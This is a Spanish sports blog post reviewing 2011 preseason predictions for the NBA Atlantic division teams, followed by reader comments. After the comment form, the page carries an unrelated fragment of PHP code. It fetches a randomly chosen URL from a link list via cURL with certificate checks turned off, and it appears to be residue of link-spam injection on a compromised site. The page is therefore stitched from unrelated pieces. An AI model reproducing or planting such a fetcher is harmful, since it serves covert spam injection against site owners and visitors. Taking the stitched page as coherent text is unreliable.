Revisando pronósticos 2011: Atlantic

26 de January de 2011 por TheDeerHunter

Como todos los años hacia mitad de temporada, hacemos nuestro particular examen de conciencia para verificar cómo de lúcidos estuvimos a principio de curso a la hora de evaluar las expectativas cada una de las franquicias.

BOSTON CELTICS

Pronóstico Septiembre 2010: Campeones
Probabilidad de acierto: Alta
Calificación pronóstico: A
Análisis

Los aficionados verdes se dieron un buen susto hace poco con otra lesión de Garnett, que podría haber sido demoledora. Antes de eso ya llevaban toda la temporada padeciendo contratiempos. Desde Perkins a Shaquille, pasando por Jermaine y Delonte.

A pesar de todo, ahí están, con un 77% de victorias, una de las mejores defensas del campeonato (sin echar de menos a Thibodeau) y uno de los despliegues colectivos más interesantes y letales ofensivamente hablando. Las claves han sido el rendimiento all-star de Garnett y Allen, a los que algunos ya daban por acabados, el eterno liderazgo de Pierce, la definitiva explosión de Rondo (y hablamos de 4 potenciales all-stars) más la satisfactoria adaptación de Shaq y la sólida aportación de todos los secundarios. También ha sido un factor importante la irregularidad de prácticamente todos sus rivales, aunque este equipo está llamado a crecer con una plantilla superior a la de su último campeonato.

La gran frase de nuestro análisis fue: Hoy no son favoritos, pero en abril nadie les querrá enfrente.” Precisamente ahora mismo no son los líderes pero, teniendo en cuenta su rendimiento, su potencial y las carencias ajenas, podemos afirmar que nadie les querrá tener enfrente en abril… ni en mayo.

NEW YORK KNICKS

Pronóstico Septiembre 2010: Fuera de Playoffs
Probabilidad de acierto: Baja.
Calificación pronóstico: D
Análisis

Los Knicks llevaban camino de ser una de las sorpresas positivas de la temporada. La dupla Amare-Felton ha cerrado muchas bocas y con su posible condición all-star han justificado cada dólar de su alto sueldo. Fields ha sido el robo del draft y ha estado nominado como el mejor rookie de su conferencia durante los primeros meses. La atípica combinación Chandler-Gallinari ha funcionado e incluso una segunda unidad incierta con Douglas, Shawne Williams, Turiaf y Walker ha logrado hacer olvidar las decepciones de Randolph, Mason o Mozgov.

D’Antoni ha conseguido definitivamente implantar el estilo Suns en el Este. Lo ha hecho con éxito y en una situación muy comprometida. La guinda habría sido la incorporación de algún crack que todos tenemos en mente y también que fueran capaces de colocarse mejor de cara a primera ronda. No lo lograrán y posiblemente ese sea su techo este año… pero parece que esto puede ser la base para que los Knicks salgan definitivamente del abismo. Y no es moco de pavo.

PHILADELPHIA 76ERS

Pronóstico Septiembre 2010: 8os del Este
Probabilidad de acierto: Media.
Calificación pronóstico: C+
Análisis

Fue uno de los análisis más criticados aunque parece acertar en algunas claves esenciales. La plantilla se ha mostrado todo lo compensada que advertimos y Doug Collins ha logrado gestionarla con acierto, beneficiado por el bajo nivel de la conferencia en su particular guerra.

El gran fracaso ha sido Evan Turner, quien no está logrando justificar su pick nº2 del draft  a pesar de ser considerado por algunos como el verdadero nº1 de la generación.  Iguodala tampoco ha logrado brillar como se esperaba.

En cambio han estado afortunados en casi todo lo demás, haciendo renacer a Brand de sus cenizas, involucrando a Thaddeus para la causa, sabiendo combinar de forma óptima a sus talentosos bases y manejando todas las piezas disponibles con buen criterio colectivo.

Son carne de primera ronda (si es que la alcanzan) y tampoco se vislumbra demasiado bien hacia dónde se dirigen, pero sería un buen premio para ellos llegar a postemporada este mismo año. Casi nadie habría dado un duro por ello al principio del curso.

TORONTO RAPTORS

Pronóstico Septiembre 2010: 20-25 victorias
Probabilidad de acierto: Alta.
Calificación pronóstico: A-
Análisis

No hacía falta ser Nostradamus para concluir que los Raptors iban a ser de lo peorcito de la liga… pero hilamos más fino. 20-25 victorias que clavaríamos si mantienen su balance.

Siendo justos el esperpento no es tanto como indica su clasificación o como la mayoría esperábamos al principio de curso. Con algo menos de mala suerte quizás podríamos estar hablando de un fracaso en toda regla de nuestro pronóstico. Entre unas cosas y otras el roster no ha podido tener continuidad en ningún momento de la campaña. Encontraron un diamante en Reggie Evans, al lado de Bargani (para mayor gloria de los 6 kilos que le pagan al año a Amir) pero primero se lesionó uno y después ha ido lesionándose intermitentemente el otro. Han recuperado parcialmente a Calderón, sobre todo cuando largaron a Jack, pero también se pone de baja cada dos por tres por los motivos más diversos. Tan solo DeRozan y Amir Johnson han podido jugar siempre. El resto, Barbosa, Davis, Bayless… contar con todos ellos es casi una lotería para Triano.

Cuando los astros se han confabulado para que hayan podido juntar un equipo medianamente competente, los Raptors no han jugado del todo mal y así pueden atestiguarlo gallos como Celtics, Mavs o Thunder, que tuvieron que sufrirlos. Con todo, son el 15º equipo que más anota y el 12º que más asiste. En ningún caso son el peor equipo de la liga como muchos auguraban.

NEW JERSEY NETS

Pronóstico Septiembre 2010: 25-30 victorias
Probabilidad de acierto: Media.
Calificación pronóstico: B-
Análisis

En una cosa está claro que acertamos. Era complicado hacerlo peor que la anterior campaña. También que se van a quedar fuera de postemporada. Es de Perogrullo.

Pero no, esperábamos algo más. No esperábamos una crucifixión pública de Troy Murphy o de Terrence Williams. No esperábamos una plantilla tan mal gestionada por Avery Johnson. Esperábamos más que una temporada mediocre de Devin Harris y Brook Lopez. Mejores prestaciones de Favors, de Outlaw, de Morrow… No esperábamos que Humphries  se erigiera como el salvador de la patria ni que se iba a ligar a la más guapa de las Kardashian, o que el fichaje de Vujacic iba a suponer un salto de calidad a la plantilla…

Esperábamos que apareciese el oro de Mr. Prokhorov.

No creo que alcancen ni las 25.

Imágenes | Getty Images

Comenta

5 comentarios a esta entrada

  1. sergio dice:
    #1

    Joe… me toco hacer el analisis del equipo revelacion de esta temporada. Nadie esperaba la rapida conexion de los jugadores de los Knicks. Todo merito de ellos y poco el mio al no confiar en la plantilla. Espero que comprendais que habia muchisimas incognitas a priori.

    Eso si, que no se duerman, que tienen un calendario algo mas complicado del que han recorrido hasta ahora (se enfrentan a casi todos los grandes equipos mas de una vez) y estan a la misma distancia del 5º que del 9º. Y no es lo mismo jugar con Orlando o Bulls que hacerlo contra Boston/Miami. Aunque por supuesto eso no minimizaria lo mas minimo mi fracasado pronostico jaja.

      Citar

  2. MagicJohnson32 dice:
    #2

    La verdad es que en el Este, del 6º para abajo me parece que entra todo en la categoría de medianías / mediocridades. No implica una gran diferencia cualitativa el acabar 6º o fuera de Playoffs, que mira a los Bobcats, octavos con 19-25. Vamos, que a mí los Knicks no me dicen nada (de momento, claro, porque si fichan a Melo sería otra cosa).

    Aprovecho la ocasión para plantear… ¿adónde van los Sixers? ¿Qué pretenden? O lo que es lo mismo: ¿a qué esperan para traspasar a Iguodala?

    Por cierto, buenos análisis, independientemente del grado de acierto.

      Citar

  3. Viva_Dirk dice:
    #3

    Buena pregunta la de Iguodala, añado que deberian ser los Clippers los que se hicieran con el, eso les dejaría un tremendo quinteto a nivel físico, sin dejar de lado la calidad.

      Citar

  4. kantonyo dice:
    #4

    A destacar el nivel que está ofreciendo Amir Johnson 26.5 de efficiencia en los últimos 6 partidos. Está pasando desapercibido en el blog, pero hace tiempo dije que me parece un jugador que siempre cumplía en los pocos minutos que disputaba.

    No es por meter el dedo en el ojo, jajajaj, (perdona txusma) pero en el analisis se apuntaba que habia sido una de las peores renovaciones del año…

      Citar

  5. Txusma dice:
    #5

    Argh! El ojo!!
    Si Evans estuviera sano, Amir seguiría en el banquillo. Y por algo era…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>